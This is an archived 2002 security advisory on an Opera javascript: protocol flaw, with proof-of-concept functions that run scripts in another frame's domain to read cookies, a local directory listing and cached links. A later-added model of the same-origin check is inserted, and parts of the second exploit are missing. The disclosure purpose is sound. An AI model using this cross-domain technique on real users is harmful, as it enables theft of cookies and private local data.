
Opera javascript protocol vulnerability

by Nikola Strahija on May 15th, 2002

Opera allows the location of a frame to be overwritten by a URL using the javascript: protocol. The javascript code then runs in the same domain as the URL that was overwritten. Thus we can read cookies from other domains, the local file structure, and private information from the cache (the history of links visited).
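As an added illustration (not code from the advisory), the following model shows the check that current browsers apply before running a javascript: URL assigned to another frame's location: the script executes only when the document doing the assignment has the same origin as the document currently in the frame, and Opera 6.0/6.01 applied no such check. The origin strings, the frame object and the function names are assumptions of this model.

```javascript
// Added model of the same-origin rule for javascript: navigations; this is
// not the advisory's code. Opera 6.0/6.01 (per the advisory) ran the script
// in the frame's domain without such a check.

// Scheme of a URL as the URL parser sees it: leading/trailing C0 controls
// and spaces are ignored and the scheme is case-insensitive, so
// " JavaScript:alert(1)" is a javascript: URL too.
function schemeOf(url) {
  const trimmed = url.replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "");
  const m = /^([a-zA-Z][a-zA-Z0-9+.-]*):/.exec(trimmed);
  return m ? m[1].toLowerCase() : null;
}

// Origin of the document a URL would load. Only http(s) get a tuple origin;
// file: and anything else get an opaque origin, modelled as null, which is
// never same-origin with anything (so a file:///c:/ listing cannot be read).
function originOf(url) {
  const scheme = schemeOf(url);
  if (scheme !== "http" && scheme !== "https") return null;
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

function sameOrigin(a, b) {
  return a !== null && b !== null && a === b;
}

// frame = { origin } holds the origin of the document currently in the frame.
// Returns what a conforming browser does when a document of origin
// initiatorOrigin assigns `url` to frame.location.
function navigateFrame(initiatorOrigin, frame, url) {
  if (schemeOf(url) === "javascript") {
    // The script would run with the frame document's origin, so it is
    // only allowed when the initiator already has that origin.
    return sameOrigin(initiatorOrigin, frame.origin) ? "executed" : "blocked";
  }
  // Ordinary navigation: the frame now holds a document of the new origin.
  frame.origin = originOf(url);
  return "navigated";
}

// Replay of the advisory's readCookie() from a hostile page (constructed).
function demo() {
  const frame = { origin: "http://www.google.com" };
  return navigateFrame("http://attacker.test", frame,
                       "javascript:alert(document.cookie)"); // "blocked"
}
```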


EXPLOIT I:
==========
The following exploit has been tested to work on Opera 6.01, 6.0 (win). It
will not work on 5.x because it requires the iframe feature.

------------------- CUT HERE -----------------------------------



Read google cookie
Read c:/ structure (win)
Read links in cache

function readCookie(){
// "cookie" is the name of an iframe loaded from the target domain; Opera
// runs the javascript: URL in that frame's domain, so document.cookie is
// the target's cookie.
cookie.location="javascript:alert(document.cookie)";
}
function readFiles(){
// "files" is an iframe showing a file:// directory listing (c:/ on win);
// each link of the listing is one file or directory entry.
t = 'javascript:s="";l=document.links;';
t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
files.location = t;
}
function readCache(){
// "cache" is an iframe whose document lists the cache; its links are the
// cached URLs, i.e. the history of links visited.
t = 'javascript:s="";l=document.links;';
t+= 'for(i=0;l.item(i);i++) s+=l.item(i);alert(s);';
cache.location = t;
}

------------------- CUT HERE -----------------------------------


EXPLOIT II:
===========
For versions of Opera not supporting the iframe tag the exploit must be
done using the frame tag instead. The following exploit has been tested on
Opera 6.01, 6.0, 5.12 (win).

------------------- CUT HERE -----------------------------------








------------------- CUT HERE -----------------------------------
payload.html:
------------------- CUT HERE -----------------------------------
Google
cookie

First
item in cache

First
file/directory in c: (win)

------------------- CUT HERE -----------------------------------


Disclaimer:
===========
Andreas Sandblad is not responsible for the misuse of the
information provided in this advisory. The opinions expressed
are my own and not of any company. In no event shall the author
be liable for any damages whatsoever arising out of or in
connection with the use or spread of this advisory. Any use of
the information is at the user's own risk.


Old advisories:
===============
#5 [2002-04-26] "Mp3 file can execute code in Winamp."
http://online.securityfocus.com/archive/1/269724
#4 [2002-04-15] "Using the backbutton in IE is dangerous."
http://online.securityfocus.com/archive/1/267561


Feedback:
=========
Please send suggestions and comments to: [email protected]

Andreas Sandblad,
student in Engineering Physics at the University of Umea, Sweden.


Date: [2002-05-15]
Software: At least Opera 6.01, 6.0, 5.12 (win)
Rating: High because Opera is assumed to be secure
Impact: Read cookies/local filestructure/cache
Vendor: Opera has confirmed the vulnerability and today released a new
version 6.02 fixing the issue. http://www.opera.com/
Workaround: Disable javascript.
Author: Andreas Sandblad, [email protected]

